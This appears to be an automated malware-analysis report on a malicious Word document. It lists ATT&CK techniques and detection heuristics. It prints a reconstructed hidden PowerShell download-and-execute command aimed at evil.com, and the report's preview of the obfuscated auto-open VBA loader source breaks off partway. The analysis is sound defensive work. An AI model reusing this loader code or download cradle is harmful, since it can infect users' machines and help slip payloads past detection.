Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains critical heuristics indicating an obfuscated auto-exec VBA loader that uses Shell() calls. The VBA script attempts to construct and execute a PowerShell command, most likely to download and run a second-stage payload. The reconstructed PowerShell command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')"', which strongly suggests downloader functionality.
Heuristics (7)

- VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS): Document contains VBA macro code.
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA.
- Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 143421 bytes |

SHA-256: 70cdb765da4ff4f9e12ec79cb2d3cac32d982e8206a2439bd88c7a8f859432cf

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "jQVzALI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uYCTrok()
On Error Resume Next
DrkBEVYv = (zVijGzSWC - CDbl(554336) + OBIlir + Fix(DAPhcIRMYKW / CLng(644221 * Sqr(YMcnGk))) - 5189 / Sin(atFvpwoUIXv - FJHRX - 672561 + CLng(wXNMUiowK)) * 739023 * Fix(554336))
zGzbMq = "viiqkfNJxUOk4& ((VArIFba' V1W4Vowershell IEx( (VzzYORMg67JJALnszy89pfZ10AJyS3Mgw"
rrkIcU = CStr(Left(Right(zGzbMq, 50), 17)) + CStr(Left(Right(zGzbMq, 57), 2)) + CStr(Left(Right(zGzbMq, 68), 8))
ERzmSDYK = "viiqkfNr*aWk4dALzABLe aWf*M1W4VPcvNVlyo3fpmYE"
hKAZijX = CStr(Left(Right(ERzmSDYK, 28), 10)) + Left(Right(ERzmSDYK, 32), 1) + CStr(Left(Right(ERzmSDYK, 38), 4))
VjFZdj = "RBviiqkfNJxUOf).NAme[3'FbaXRV1W4,1cv"
niRhZZF = Left(Right(VjFZdj, 23), 8) + CStr(Left(Right(VjFZdj, 15), 1)) + CStr(Left(Right(VjFZdj, 4), 2)) + CStr(Left(Right(VjFZdj, 14), 1))
twnbiwcrFDH = Chr(43)
jlvrKpsl = (hJTfbsUzz - CDbl(681017) + iWBMhRLm + Fix(wiiMni / CLng(838516 * Sqr(tCwYCJRm))) - 49229 / Sin(FIHZVN - zEnChZ - 70080 + CLng(awCfpCD)) * 456389 * Fix(681017))
aWrdYtkA = "iqkfNJxUOf)CALzpEzoF'1,2]-JOInaWfVlyo(fpmYErUuVzaWORMg"
UNAGbMzn = Left(Right(aWrdYtkA, 34), 12) + Left(Right(aWrdYtkA, 22), 1) + Left(Right(aWrdYtkA, 6), 2) + Left(Right(aWrdYtkA, 45), 2) + Left(Right(aWrdYtkA, 17), 1)
jPzUbp = "RBviiqkfNJxUO(aWfD47nsaFbaXRV1W4adcv"
ibUjfTF = Left(Right(jPzUbp, 23), 8) + CStr(Left(Right(jPzUbp, 15), 1)) + CStr(Left(Right(jPzUbp, 4), 2)) + CStr(Left(Right(jPzUbp, 14), 1))
SnXbkohu = "LzNaWfvii"
kRfXk = CStr(Left(Right(SnXbkohu, 6), 2)) + CStr(Left(Right(SnXbkohu, 4), 1))
WChNJv = Chr(43)
GZdPNiQmkbs = "dRBviiWfaWfsaOk4CALzp"
TKoDEvbQM = Left(Right(GZdPNiQmkbs, 13), 5) + CStr(Left(Right(GZdPNiQmkbs, 15), 1)) + CStr(Left(Right(GZdPNiQmkbs, 14), 1))
XvdOswp = Chr(43)
SwNdU = "dRBviiWfaWfdaOk4CALzp"
suqFQwCkAi = Left(Right(SwNdU, 13), 5) + CStr(Left(Right(SwNdU, 15), 1)) + CStr(Left(Right(SwNdU, 14), 1))
tzori = Chr(43)
tOtpB = (uwMSSjD - CDbl(553836) + zaSMNTPAhQr + Fix(iCAABaXq / CLng(518216 * Sqr(BXqbGdhdFh))) - 474816 / Sin(ZKwCkfKz - tjdwbqswMQ - 585953 + CLng(LMHzCclHph)) * 809822 * Fix(553836))
EPZDR = "RBviiqkfNJxUOaWf = &(BfFbaXRV1W4aWcv"
thfjaiFiTA = Left(Right(EPZDR, 23), 8) + CStr(Left(Right(EPZDR, 15), 1)) + CStr(Left(Right(EPZDR, 4), 2)) + CStr(Left(Right(EPZDR, 14), 1))
uHBBmn = Chr(43)
zmDvi = "LzNaW'vii"
IlidwGzDMk = CStr(Left(Right(zmDvi, 6), 2)) + CStr(Left(Right(zmDvi, 4), 1))
wPuzf = Chr(43)
tihRCRDoFY = "viiqkfNJxUO'fujnBuazoFbaXRVWW4"
StCiIvG = CStr(Left(Right(tihRCRDoFY, 19), 7)) + Left(Right(tihRCRDoFY, 12), 1) + CStr(Left(Right(tihRCRDoFY, 3), 1)) + CStr(Left(Right(tihRCRDoFY, 25), 1))
PFLjJGkXHBY = Chr(43)
qYjhAnWCiPa = (tZZGhT - CDbl(493373) + HrZYbil + Fix(EiXrmw / CLng(695218 * Sqr(hiiDZ))) - 449765 / Sin(APrSucbXDZB - SDIQAFCO - 343842 + CLng(SYGYoLrr)) * 411792 * Fix(493373))
mFcWKM = "LzNdaWfjiqkf"
lwFrb = Left(Right(mFcWKM, 8), 3) + Left(Right(mFcWKM, 5), 1)
RwEDmiPm = Chr(43)
tqAaz = "LzNaWfvii"
NVqaCM = CStr(Left(Right(tqAaz, 6), 2)) + CStr(Left(Right(tqAaz, 4), 1))
OQTlOjkML = Chr(43)
wNktD = (oXpJiOrsL - CDbl(841761) + zuphtWakSQ + Fix(aWrqiwKM / CLng(359962 * Sqr(EZokqD))) - 609886 / Sin(qjfZviIzc - DIcnAam - 526574 + CLng(NBwSE)) * 382000 * Fix(841761))
QAhfOPPY = "LzNaW'vii"
zaCanq = CStr(Left(Right(QAhfOPPY, 6), 2)) + CStr(Left(Right(QAhfOPPY, 4), 1))
cluKwQZWk = Chr(43)
MSwzPKBWD = "viiqffNJx'fBujaLzpEzoWba"
idcuK = CStr(Left(Right(MSwzPKBWD, 15), 5)) + Left(Right(MSwzPKBWD, 10), 1) + CStr(Left(Right(MSwzPKBWD, 3), 1)) + Left(Right(MSwzPKBWD, 20), 1)
LQmHHISbDQ = Chr(43)
WPsjw = "dRBviiWfaWfeaOk4CALzp"
UIvDiCwnKR = Left(Right(WPsjw, 13), 5) + CStr(Left(Right(WPsjw, 15), 1)) + CStr(Left(Right(WPsjw, 14), 1))
wWnMBnOZwS = Chr(43)
DiGTOonnYtS = "LzNaW'vii"
lrJAiXTTTG = CStr(Left(Right(DiGTOonnYtS, 6), 2)) + CStr(Left(Ri ... (truncated)
```